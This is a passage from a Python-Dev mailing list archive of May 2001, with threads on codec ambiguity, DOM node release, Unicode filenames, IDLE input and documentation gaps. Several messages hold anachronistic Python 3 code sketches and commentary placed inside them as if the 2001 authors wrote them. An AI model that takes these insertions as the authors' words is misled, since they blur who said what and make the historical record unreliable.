used encoding and this can easily cause the whole encoding
mechanism to fail.

A Tk/Tcl expert should really look into this and fix _tkinter.c
to aid Tk/Tcl in not mixing up the encodings (e.g. it would
probably be a good idea to recode Python 8bit-strings into
whatever encoding Tk/Tcl assumes as default).

-- 
Marc-Andre Lemburg


From Mike.Olson@fourthought.com  Sun May 13 19:15:46 2001
From: Mike.Olson@fourthought.com (Mike Olson)
Date: Sun, 13 May 2001 12:15:46 -0600
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de>
Message-ID: <3AFECF52.FF7E9B26@FourThought.com>

"Martin v. Loewis" wrote:
> 
> 
> In PyXML, I currently use
> 
> # Define ReleaseNode in a DOM-independent way
> import xml.dom.ext
> import xml.dom.minidom
> def _releasenode(n):
>     if isinstance(n, xml.dom.minidom.Node):
>         n.unlink()
>     else:
>         xml.dom.ext.ReleaseNode(n)
> 
> try:
>     from Ft.Lib import pDomlette
>     def ReleaseNode(n):
>         if isinstance(n, pDomlette.Node):
>             pDomlette.ReleaseNode(n)
>         else:
>             _releasenode(n)
>     _XsltElementBase = pDomlette.Element
> except ImportError:
>     ReleaseNode = _releasenode
>     from minisupport import _XsltElementBase
> 
> This code knows how to release minidom, 4DOM, and pDomlette nodes, and
> supports installations without 4Suite (i.e. without pDomlette). I've
> put this into xslt/__init__.py, so that all callers of
> Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode.
> If desired, I could produce a patch against the public Ft CVS.

What if we put these on the implementation, or came up with a
standard interface on the node?  Then every DOM implementation that wants
to be compatible with XPath/XSLT would need to support this interface.


node.ownerDocument.implementation.releaseNode(node)

or

node.py_unlink()


> 
> As a slightly independent question, such a function also ought to
> support DOM implementations not known to it; I'm thinking in
> particular of the Zope DOMs. I'd like to hear proposals on how such an
> interface should work; I see three options:

See above

> 
> a) it is an operation on the document node (or any node), as in minidom.
> b) it is an operation on the DOM implementation (almost as in 4Suite;
>    you'd need to navigate from the node to the implementation, then
>    you'd need a well-known operation on the implementation)
> c) the code assumes that no release activity is necessary for unknown
>    DOMs, effectively believing in reference counting, garbage collection,
>    acquisition, and other black art.

I like either a or b

Mike

> 
> Any comments appreciated, in particular
> 1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and
> 2. from authors of other DOMs on a general memory management API for
>    Python DOM.
> 
> Regards,
> Martin
> 
> _______________________________________________
> 4suite mailing list
> 4suite@lists.fourthought.com
> http://lists.fourthought.com/mailman/listinfo/4suite

-- 
Mike Olson				 Principal Consultant
mike.olson@fourthought.com               (303)583-9900 x 102
Fourthought, Inc.                         http://Fourthought.com 
Software-engineering, knowledge-management, XML, CORBA, Linux, Python


From tim.one@home.com  Sun May 13 19:31:42 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 13 May 2001 14:31:42 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <3AFEC241.62084286@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOMKBAA.tim.one@home.com>

[M.-A. Lemburg]
> ...
> The "right" thing to do here, is to simply remove cp875
> from the test for round-tripping.

I'm relieved you think so, since that's what I already did <wink>.

> It is not the only encoding which fails this test, but it's not
> our fault: the codecs were all generated from the original codec
> maps at the Unicode.org site.
>
> If their mappings are broken, we can't do much about it... other
> than to ignore the error or remove the codec altogether.

On general principle I don't like either of those -- "in the face of
ambiguity, refuse the temptation to guess".  It's at least surprising to see

>>> unicode("?", "cp875").encode("cp875")
'\xfd'
>>>

now, yes?  Would it be better if an ambiguous encoding raised an exception in
"strict" mode?  That is, a third choice is to alert users when they're
relying on a broken part of a mapping.
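Tim's third option might look roughly like the sketch below. It is hypothetical and is not how Python's charmap codecs actually behave. Any target that more than one source byte maps to is dropped from the encoding table and recorded as a clash. When asked to encode such a character, the encoder raises ValueError instead of silently using whichever byte the dict iteration happened to keep. The helper names invert_strict and encode_strict are illustrative.

```python
def invert_strict(decoding_map):
    """Invert a decoding map, withholding targets reached from several bytes."""
    encoding_map = {}
    clashes = {}
    for byte, codepoint in decoding_map.items():
        if codepoint in encoding_map:
            clashes.setdefault(codepoint, {encoding_map[codepoint]}).add(byte)
        else:
            encoding_map[codepoint] = byte
    for codepoint in clashes:
        del encoding_map[codepoint]      # ambiguous: leave it unmapped
    return encoding_map, clashes

def encode_strict(text, encoding_map, clashes):
    """Encode text, refusing characters whose mapping is ambiguous."""
    out = bytearray()
    for ch in text:
        cp = ord(ch)
        if cp in clashes:
            candidates = ", ".join("0x%02X" % b for b in sorted(clashes[cp]))
            raise ValueError("ambiguous mapping for U+%04X (bytes %s)" % (cp, candidates))
        if cp not in encoding_map:
            raise ValueError("U+%04X cannot be encoded" % cp)
        out.append(encoding_map[cp])
    return bytes(out)

# Hypothetical three-entry excerpt: bytes 0x3F and 0xFD both decode to U+001A
decoding_map = {0x3F: 0x1A, 0xFD: 0x1A, 0x41: 0x41}
encoding_map, clashes = invert_strict(decoding_map)
print(encode_strict("A", encoding_map, clashes))
try:
    encode_strict("\x1a", encoding_map, clashes)
except ValueError as exc:
    print(exc)
```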


From martin@loewis.home.cs.tu-berlin.de  Sun May 13 20:08:47 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 13 May 2001 21:08:47 +0200
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
In-Reply-To: <3AFECF52.FF7E9B26@FourThought.com> (message from Mike Olson on
 Sun, 13 May 2001 12:15:46 -0600)
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com>
Message-ID: <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de>

> What if we put these on the implementation, or came up with a
> standard interface on the node?  Then every DOM implementation that wants
> to be compatible with XPath/XSLT would need to support this interface.
> 
> 
> node.ownerDocument.implementation.releaseNode(node)
> 
> or
> 
> node.py_unlink()

releaseNode sounds good to me; it is unlikely that W3C would give an
operation that name but a different meaning. Any objections?
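Here is a minimal sketch of how a caller might combine the options discussed here. It assumes the proposed `releaseNode` operation on the DOM implementation. That is only a proposal and not an existing API; minidom's `DOMImplementation` has no such method. The helper tries `releaseNode` first, falls back to minidom's existing `unlink()`, and otherwise assumes no explicit release is needed (option c). The helper name `release_node` and its string return values are illustrative only.

```python
from xml.dom import minidom

def release_node(node):
    """Release a DOM node with the best mechanism available.

    Returns the name of the strategy used (for illustration only).
    """
    # A Document's ownerDocument is None, so fall back to the node itself.
    doc = getattr(node, "ownerDocument", None)
    if doc is None:
        doc = node
    impl = getattr(doc, "implementation", None)
    release = getattr(impl, "releaseNode", None)   # proposed, hypothetical
    if callable(release):
        release(node)
        return "implementation"
    unlink = getattr(node, "unlink", None)         # minidom's existing method
    if callable(unlink):
        unlink()
        return "unlink"
    return "none"   # option c: rely on refcounting and garbage collection

doc = minidom.parseString("<root><child/></root>")
print(release_node(doc))   # minidom offers no releaseNode, so unlink() is used
```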

Regards,
Martin


From tim.one@home.com  Sun May 13 20:45:40 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 13 May 2001 15:45:40 -0400
Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames
In-Reply-To: <E14yqvu-0008Jb-00@usw-sf-web1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEPAKBAA.tim.one@home.com>

> http://sourceforge.net/tracker/?func=detail&atid=305470&aid=410465&
>    group_id=5470
>
> Category: core (C code)
> Group: None
> >Status: Closed
> >Resolution: Accepted
> Priority: 5
> Submitted By: Mark Hammond (mhammond)
> Assigned to: Mark Hammond (mhammond)
> Summary: Allow pre-encoded strings as filenames
>
> Initial Comment:
> This patch enables most filename parameters to use pre-
> encoded strings.  On Windows, the default of "mbcs" is
> used.  On all other platforms, the default filename
> encoding is the same as the general default encoding,
> which in reality means there is no functional change.
> However, other platforms can simply plugin their own
> encodings.
> ...

Mark (or anyone else who understands all this), were doc changes included?
Can someone please add a briefer user-oriented blurb to Misc/NEWS too?


From tim.one@home.com  Sun May 13 21:54:50 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 13 May 2001 16:54:50 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <004001c0d919$a62de7d0$e46940d5@hagrid>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEPDKBAA.tim.one@home.com>

[/F]
> as a footnote, SRE uses the same source code to generate
> both 8-bit and 16-bit versions of the match engine.  I see no
> reason why we cannot do the same for the string operations
> (PyString, PyUnicode, and strop).
>
> if anyone wants me to look into this, just say "go ahead".

go ahead

Here's another idea:  whenever we fix or extend Python's "%" formats, it
requires changes in both stringobject.c and unicodeobject.c, but they've
diverged in irritating ways that make it a fresh adventure in each.

In the early days, Python handled % formats pretty much by just building a
format string and passing that on to C's sprintf.

But as the years have gone by, and the number of buggy platforms increased,
Python has taken over more & more of it itself.  For example, it doesn't
trust sprintf to deal with justification, 0-fill or blank-fill, and needed to
grow its own from-scratch code for integer conversion in order to handle
Python longs.  In addition, it also grew a PyErr_Format() routine as yet
another layer of simulating what a safe sprintf-alike should do.  Even with
all that, we've still got platform bugs due to, e.g., platform %#x and %#o
conversion adding base markers when "they shouldn't" (according to C), or not
adding them when "they should" (according to Python).

All in all, the code would be simpler and quicker now if we left the platform
sprintf out of sprintf operations entirely <wink>.  The only thing we're not
simulating ourselves is float->string conversion.  Unfortunately, we can't do
that without also doing string->float, because platforms vary in the float
strings they can read back (e.g., if Python does float->string and produces
"Inf" for positive infinity, but uses strtod or atof to read floats back in,
it's a x-platform crapshoot whether "Inf" can be read back in).

but-in-favor-of-merging-the-code-even-without-that-ly y'rs  - tim


From tim.one@home.com  Sun May 13 22:00:32 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 13 May 2001 17:00:32 -0400
Subject: [Python-Dev] test___all__ failing on WIndows
In-Reply-To: <15098.42607.84670.323361@beluga.mojam.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEPDKBAA.tim.one@home.com>

[skip@pobox.com]
> I (thankfully) gave up even pretending to run Windows recently, so
> I can only make a suggestion for others who look into this problem.
> Try this:
> Change test___all__.check_all so that the except clause reads:
>
>     except ImportError, msg:
>
> then print out msg when an import fails.  You should get the actual
> module that failed to import.

Yes, that confirmed termios was the culprit.  Thanks!  Fixed by adding

import termios
del termios

in pty.py.  As the irritated comment before this new code says, this is
absurd.
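Skip's suggestion amounts to something like the Python 3 sketch below. The `check_all` here is a simplified stand-in and not the real test___all__ helper. It catches the ImportError and reports the message, which names the module that could not be imported. In Python 3 the exception is raised as ModuleNotFoundError, a subclass of ImportError.

```python
import importlib

def check_all(modname):
    """Import modname; on failure, report which module actually failed."""
    try:
        importlib.import_module(modname)
    except ImportError as msg:
        # str(msg) names the missing module, e.g. "No module named 'termios'"
        print("import of %s failed: %s" % (modname, msg))
        return str(msg)
    return None

check_all("os")
check_all("no_such_module_xyz")
```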

since-you're-on-a-roll-how-about-fixing-test_urllib2-too<wink>-ly
    y'rs  - tim


From guido@digicool.com  Sun May 13 23:26:39 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:26:39 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: Your message of "Sun, 13 May 2001 00:32:10 +0200."
 <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com>
 <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
Message-ID: <200105132226.RAA21159@cj20424-a.reston1.va.home.com>

> > Now, if you are using the 1.4 version of ExtensionClasses you might
> > not have the tp_flags field either (I don't know, I can't easily
> > check) but the 1.5.2-compatible version of ExtensionClasses doesn't
> > even require recompilation to work with Python 2.1.
> 
> I'll attach a copy below of the struct as defined in
> pygtk-0.7.0-unstable-dont-use.tar.gz

Hmm...  I like that filename. :-)

> (0.6.6 does not use extension
> classes). As you can see, it does not provide tp_flags, but has a
> field of tp_xxx4 for it.

Sorry, that's what I meant.  This is guaranteed to be initialized to 0
(unless a module goes out of its way to put a value in it, in which
case they deserve what they get).

> That *should* work, except that it also has its 'methods' field where
> tp_traverse would go, and its class_flags field where tp_clear would
> go.
> 
> Now, you write
> 
> > ExtensionClasses (at least recent versions that worked with 1.5.2)
> > contain a copy of the type object up to and including the tp_flags
> > field, and the 2.1 code is careful not to use any newer fields
> > without first checking the corresponding flag bit.
> 
> In this generality, it is apparently not true: Modules/gcmodule.c has,
> in delete_garbage,
> 
> 			if ((clear = op->ob_type->tp_clear) != NULL) {
> ...
> 		traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse;
> 		(void) traverse(PyObject_FROM_GC(gc),
> 			       (visitproc)visit_decref,
> 			       NULL);
> 
> which does not check any flags. That still shouldn't cause any
> problems, since the Gtk objects should never end up in the GC lists -
> but may be I'm missing something.

I agree with your analysis: op here is gotten from a PyGC_Head, so it
cannot be a PyExtensionClass instance, so Neil's code should be safe.
Objects never have a GC head unless they specifically request it;
PyExtensionClass certainly doesn't request a GC head.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Sun May 13 23:37:44 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:37:44 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Sat, 12 May 2001 16:53:26 -0400."
 <Pine.NXT.4.21.0105121640050.261-100000@localhost>
References: <Pine.NXT.4.21.0105121640050.261-100000@localhost>
Message-ID: <200105132237.RAA21223@cj20424-a.reston1.va.home.com>

>  As I said earlier: the only advantage would be if it could simplify 
> things "under the hood" (compared to metaclasses) but could still 
> provide the same Class semantics (with maybe a "proto" declaration
> sneaking its nose in under the tent.) 
>  But I have no immediate idea on how to do that, and it sounds like
> you're pretty far along into an implementation already. 

I don't know how to do it either, but I suspect it wouldn't be easy.

>  I guess my practical question, which I meant to ask before I got
> myself sidetracked into preaching prototypes is: How much of the
> existing plumbing (specifically the Don Beaudry hack) can I rely
> on in the future for the objective-C/python bridge ? 
>  With BOOST and Zope's extension classes relying on it, can I 
> assume that it's being extended rather than replaced ? 
> ( I guess I ought to take a look at the code! ) 

I'm currently not too concerned with backwards compatibility, and Jim
Fulton has proclaimed that he would prefer to get rid of
ExtensionClasses (since what I'm building goes way beyond them!), so
I'm not sure I can be motivated to support it just for BOOST's sake.
There will be a replacement mechanism that will be at least as
powerful, and I'm sure that BOOST etc. can be rewritten to use the new
mechanism easily.  That's what we're planning for Zope.

> Guido: did you ever imagine back at that first workshop at NIST
> that you and Python would be where you are today ? 

No way!  I knew I was on to something, but I had no idea onto what...
I'll always hold on to the T-shirt you made.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Sun May 13 23:43:57 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:43:57 -0500
Subject: [Python-Dev] status of pre?
In-Reply-To: Your message of "Sat, 12 May 2001 00:18:27 +0200."
 <00ca01c0da68$4fc66570$e46940d5@hagrid>
References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> <200105111847.NAA05835@cj20424-a.reston1.va.home.com>
 <00ca01c0da68$4fc66570$e46940d5@hagrid>
Message-ID: <200105132243.RAA21290@cj20424-a.reston1.va.home.com>

> 2.2 is to be released in october, right?  I'm sure I could shake
> out the remaining bugs in my "stackless SRE" patch until then...

Knowing you that means you'd start working on them late September. :-)

There's actually a possibility that if my types/classes stuff goes
well, Digital Creations will ask for a 2.2 release sooner (e.g. July).
This might have an experimental status, e.g. it might not be backwards
compatible, but it would be the version required by Zope 2.4.  On the
other hand, none of that may happen, or that release would be labeled
2.2b1 or something, or Zope 2.4 might come out after October.

What I'm trying to say is, please try to fix stackless SRE sooner
rather than later!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Sun May 13 23:51:17 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:51:17 -0500
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: Your message of "Fri, 11 May 2001 22:53:55 +0200."
 <200105112053.WAA15657@pandora.informatik.hu-berlin.de>
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de>
Message-ID: <200105132251.RAA21344@cj20424-a.reston1.va.home.com>

> Thanks to a bug report I got, I noticed for the first time that you
> cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell
> prompt, you may get
> 
> >>> s='äö'
> UnicodeError: ASCII encoding error: ordinal not in range(128)

This doesn't bother me, because I don't know how to enter such
characters with my US keyboard anyway. :-) :-)

> Likewise, when trying to save a file that has non-ASCII characters,
> you get a traceback.

Yes, this has bitten me once.  It was very painful (I lost a few hours
worth of writing).

In other words, I agree it's a problem!

> Now, I think I understand all the causes of the problem (Tkinter
> returning Unicode objects, and so on). However, I'm curious whether
> anybody has proposals on how to deal with it.

Not me -- unfortunately, there are too many alternatives to IDLE to
be able to justify working on it much.

> For saving text files, if Python had an encoding directive, things
> might be easier :-) For the shell prompt, I've no idea how to solve
> this best.
> 
> So any suggestions are welcome.

Ditto.

Postscript: using cut and paste, I *can* enter "s='äö'" in IDLE at the
Python prompt, both on Linux and on Windows 98.  It prints as
'\xe4\xf6' on both systems.  What changed?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From Mike.Olson@fourthought.com  Mon May 14 02:02:03 2001
From: Mike.Olson@fourthought.com (Mike Olson)
Date: Sun, 13 May 2001 19:02:03 -0600
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de>
Message-ID: <3AFF2E8B.31B9ED97@FourThought.com>

"Martin v. Loewis" wrote:
> 
> > What if we put these on the implementation, or came up with a
> > standard interface on the node?  Then every DOM implementation that wants
> > to be compatible with XPath/XSLT would need to support this interface.
> >
> >
> > node.ownerDocument.implementation.releaseNode(node)
> >
> > or
> >
> > node.py_unlink()
> 
> releaseNode sounds good to me; it is unlikely that W3C would give an
> operation that name but a different meaning. Any objections?


Should we standardize all of the python xml extensions with a py
prefix?  pyReleaseNode or py_releaseNode?  Then we will never have to
worry about a name clash.

Mike
> 
> Regards,
> Martin

-- 
Mike Olson				 Principal Consultant


From MarkH@ActiveState.com  Mon May 14 02:37:35 2001
From: MarkH@ActiveState.com (Mark Hammond)
Date: Mon, 14 May 2001 11:37:35 +1000
Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEPAKBAA.tim.one@home.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEKLDMAA.MarkH@ActiveState.com>

[Tim]
> Mark (or anyone else who understands all this), were doc changes included?
> Can someone please add a briefer user-oriented blurb to Misc/NEWS too?

No problem.

Where should the "real" documentation go?  It seems maybe we need a new
sub-heading under the "6.1 - os -- Misc. OS Interface" - something like:

6.1.x - Unicode and the file system
  - general discussion.
  - Windows specific
  - Mac specific should that appear.
  - OS' with no special support (ie, "the rest")

Does that make sense?

I have made this change to Misc/NEWS.  Does this look OK (obviously once I
know what to replace "[????]" with :)

And-I-will-do-the-registry-docs-at-the-same-time ly,

Mark.

Index: NEWS
===================================================================
RCS file: /cvsroot/python/python/dist/src/Misc/NEWS,v
retrieving revision 1.166
diff -r1.166 NEWS
4a5,21
> - Some operating systems now support the concept of a default Unicode
>   encoding for file system operations.  Notably, Windows supports 'mbcs'
>   as the default.  The Macintosh will also adopt this concept in the medium
>   term, although the default encoding for that platform will be other than
>   'mbcs'.
>   On operating systems that support non-ASCII filenames, it is common for
>   functions that return filenames (such as os.listdir()) to return Python
>   string objects pre-encoded using the default file system encoding for
>   the platform.  As this encoding is likely to be different from Python's
>   default encoding, converting this name to a Unicode object before passing
>   it back to the operating system would result in a Unicode error, as Python
>   would attempt to use its default encoding (generally ASCII) rather
>   than the default encoding for the file system.
>   In general, this change simply removes surprises when working with
>   Unicode and the file system, making these operations work as
>   you expect, increasing the transparency of Unicode objects in this context.
>   See [????] for more details, including examples.
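For readers on a current interpreter, here is a sketch of the same idea as it later appeared in Python 3. These APIs postdate this patch and are not what it added. `sys.getfilesystemencoding()` reports the platform's file system encoding, and `os.fsencode()`/`os.fsdecode()` convert names with it, so callers do not depend on the default string encoding.

```python
import os
import sys

print(sys.getfilesystemencoding())   # platform-dependent, e.g. 'utf-8'

name = "r\u00e9sum\u00e9.txt"         # "résumé.txt"
raw = os.fsencode(name)              # str -> bytes in the file system encoding
print(raw)
print(os.fsdecode(raw) == name)      # and back again

# os.listdir() mirrors its argument type: a bytes path yields bytes names.
print(all(isinstance(n, bytes) for n in os.listdir(b".")))
```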


From tim.one@home.com  Mon May 14 03:52:22 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 13 May 2001 22:52:22 -0400
Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPIEKLDMAA.MarkH@ActiveState.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEPOKBAA.tim.one@home.com>

[Mark Hammond]
> ...
> Where should the "real" documentation go?  It seems maybe we need a
> new sub-heading under the "6.1 - os -- Misc. OS Interface" - something
> like:
>
> 6.1.x - Unicode and the file system
>   - general discussion.
>   - Windows specific
>   - Mac specific should that appear.
>   - OS' with no special support (ie, "the rest")
>
> Does that make sense?

So far as it goes, yes.  I think the manual desperately needs a Unicode
section for other reasons, though:  from traffic on c.l.py, it's clear that
few people can figure out how to do *anything* with Unicode now unless their
first name begins with "M" (Mark, Martin, Marc -- definitely not Skip
<wink>).  There's no overview and there are no examples.  The primary string
method doesn't even mention Unicode (here paraphrasing questions that pop
up):

    encode([encoding[,errors]])
    Return an encoded version of the string.

What does "encoded version" mean?  Is that another string?  An encoding
object of some sort?  Etc.

    Default encoding is the current default string encoding.

What's the "current default string encoding"?  How can I find out?  Can't
even guess what *type* it has (string? magic object? little integer?).  If I
don't want the default encoding, how do I specify a different one?  What are
the possible values?  Again, can't even guess the type of the object that
needs to be passed for encoding.

    errors may be given to set a different error handling scheme.
    The default for errors is 'strict', meaning that encoding
    errors raise a ValueError. Other possible values are 'ignore'
    and 'replace'.

So what do 'ignore' and 'replace' mean?

There's more left unsaid here than a single example could clarify, but
there's not even an example -- so people stare at this wholly
uncomprehending.
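The three error modes are easiest to understand side by side. This is a short Python 3 sketch; in 2.1 the same handler names applied to unicode.encode(). 'ignore' drops characters the codec cannot represent, 'replace' substitutes '?' when encoding, and the default 'strict' raises UnicodeEncodeError, which is a subclass of ValueError.

```python
text = "na\u00efve caf\u00e9"           # "naïve café"

print(text.encode("ascii", "ignore"))   # b'nave caf'
print(text.encode("ascii", "replace"))  # b'na?ve caf?'

try:
    text.encode("ascii")                # errors="strict" is the default
except UnicodeEncodeError as exc:       # a subclass of ValueError
    print(type(exc).__name__, isinstance(exc, ValueError))
```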

If they stumble into the unicode() builtin function (in a different part of
the manual, neither referencing nor referenced by the .encode() method), it's
no better:

    unicode(string[, encoding[, errors]])
    Decodes string using the codec for encoding.

What?  Hard to even guess what the function returns.  Maybe, from the name, a
Unicode string?

    Error handling is done according to errors.

What?

    The default behavior is to decode UTF-8 in strict mode,
    meaning that encoding errors raise ValueError.

How do encoding errors arise from a function that *de*codes?

    See also the codecs module.

Which helps, but the relationship between the codecs module and the unicode()
function isn't spelled out there either.  Look up "encoding" in the index,
and you get pointers to base64, quoted-printable and the mimetypes module,
which only confuses things more.
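For the decoding direction, here is a Python 3 sketch where str(bytes, encoding) plays the role of unicode(string, encoding). The result is a Unicode string. A decoding failure raises UnicodeDecodeError, which, like its encoding counterpart, is a ValueError subclass. The 'replace' handler substitutes U+FFFD REPLACEMENT CHARACTER when decoding.

```python
data = b"caf\xe9"                       # Latin-1 bytes for "café"

print(str(data, "latin-1"))             # decode with an explicit codec
print(data.decode("latin-1"))           # the same via the bytes method

try:
    data.decode("utf-8")                # 0xE9 starts an incomplete UTF-8 sequence
except UnicodeDecodeError as exc:       # decoding failures are ValueErrors too
    print(isinstance(exc, ValueError), exc.reason)

print(ascii(data.decode("utf-8", "replace")))   # 'caf\ufffd'
```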

I don't expect you to fix this <wink>, I'm trying to get across that the
Unicode docs need work even without new gimmicks.  If Fred agrees, I'm sure
he'll think of a good place to put the new info too.

> I have made this change to Misc/NEWS.  Does this look OK
> (obviously once I know what to replace "[????]" with :)

Absolutely, and I don't even have to read it to say so <wink>:  once
*something* is checked in, we're assured it won't get dropped on the floor
come release time, and anyone who has any quibbles with it can check in
changes.  It's not like checking in a NEWS item can break the std test suite
or cause HP-UX to crash.

well-not-really-sure-about-the-latter-ly y'rs  - tim


From barry@digicool.com  Mon May 14 05:16:18 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Mon, 14 May 2001 00:16:18 -0400
Subject: [Python-Dev] Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>
 <02e501c0dade$ab7f1080$e46940d5@hagrid>
Message-ID: <15103.23570.191115.85137@anthem.wooz.org>

>>>>> "FL" == Fredrik Lundh <fredrik@pythonware.com> writes:

    FL> (is Jython using exactly the same hashing and dictionary
    FL> algorithms as CPython?  or does it work by accident also under
    FL> Jython?)

Most likely, it's pure accident.  Jython's PyDictionary uses a Java
Hashtable underneath, so you're dependent on its behavior.

-Barry


From esr@thyrsus.com  Mon May 14 06:20:17 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Mon, 14 May 2001 01:20:17 -0400
Subject: [Python-Dev] State of curses tutorial?
Message-ID: <20010514012017.A6971@thyrsus.com>

A user pointed out a typo in the "Curses Programming with Python" tutorial
at <http://py-howto.sourceforge.net/curses/curses.html>.  While attempting
to fix it, I discovered a few things:

1. Somebody seems to have removed Andrew Kuchling's name from it.  If it
   was Andrew, that's OK -- but the reference in the latest version of the
   library docs still cites him.

2. I don't seem to have the TeX source anymore.  Where can I download it?

3. Perhaps it's time to start putting howtos in the nondist part of the
   CVS tree?
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Power concedes nothing without a demand. It never did, and it never will.
Find out just what people will submit to, and you have found out the exact
amount of injustice and wrong which will be imposed upon them; and these will
continue until they are resisted with either words or blows, or with both.
The limits of tyrants are prescribed by the endurance of those whom they
oppress.
	-- Frederick Douglass, August 4, 1857


From greg@cosc.canterbury.ac.nz  Mon May 14 06:36:49 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 14 May 2001 17:36:49 +1200 (NZST)
Subject: [Python-Dev] Mac hierarchy backwards
In-Reply-To: <20010511145640.9FCB5303181@snelboot.oratrix.nl>
Message-ID: <200105140536.RAA18098@s454.cosc.canterbury.ac.nz>

Jack Jansen <jack@oratrix.nl>:

> MacOS (<= 9) itself doesn't have chdir, because it doesn't believe
> in current directories (by design.

Well, it does have an equivalent (HSetVol). But it's not used
much by Mac software because it's usual to work with full file
specifications at all times, at least internally.

From the user's point of view, the closest thing to a
"current directory" is the way the standard file dialogs
remember which directory you were browsing in last.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From martin@loewis.home.cs.tu-berlin.de  Mon May 14 06:38:24 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 07:38:24 +0200
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
In-Reply-To: <3AFF2E8B.31B9ED97@FourThought.com> (message from Mike Olson on
 Sun, 13 May 2001 19:02:03 -0600)
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> <3AFF2E8B.31B9ED97@FourThought.com>
Message-ID: <200105140538.f4E5cOb01301@mira.informatik.hu-berlin.de>

> Should we standardize all of the python xml extensions with a py
> prefix?  pyReleaseNode or py_releaseNode?  Then we will never have to
> worry about a name clash.

IMO, no. The entire interface together is the Python DOM mapping. In
the unlikely event of a name clash, we could still decide to rename
the DOM function, or find some other magic (e.g. overloading on the
argument count).

Regards,
Martin


From mal@lemburg.com  Mon May 14 10:02:19 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 14 May 2001 11:02:19 +0200
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOEOMKBAA.tim.one@home.com>
Message-ID: <3AFF9F1B.A1CDD617@lemburg.com>

Tim Peters wrote:
> 
> [M.-A. Lemburg]
> > ...
> > The "right" thing to do here, is to simply remove cp875
> > from the test for round-tripping.
> 
> I'm relieved you think so, since that's what I already did <wink>.
> 
> > It is not the only encoding which fails this test, but it's not
> > our fault: the codecs were all generated from the original codec
> > maps at the Unicode.org site.
> >
> > If their mappings are broken, we can't do much about it... other
> > than to ignore the error or remove the codec altogether.
> 
> On general principle I don't like either of those -- "in the face of
> ambiguity, refuse the temptation to guess".  It's at least surprising to see
> 
> >>> unicode("?", "cp875").encode("cp875")
> '\xfd'
> >>>
> 
> now, yes?  Would it be better if an ambiguous encoding raised an exception in
> "strict" mode?  That is, a third choice is to alert users when they're
> relying on a broken part of a mapping.

The problem is: which part would raise the exception -- the
encoder or the decoder ?

Here are some more options:

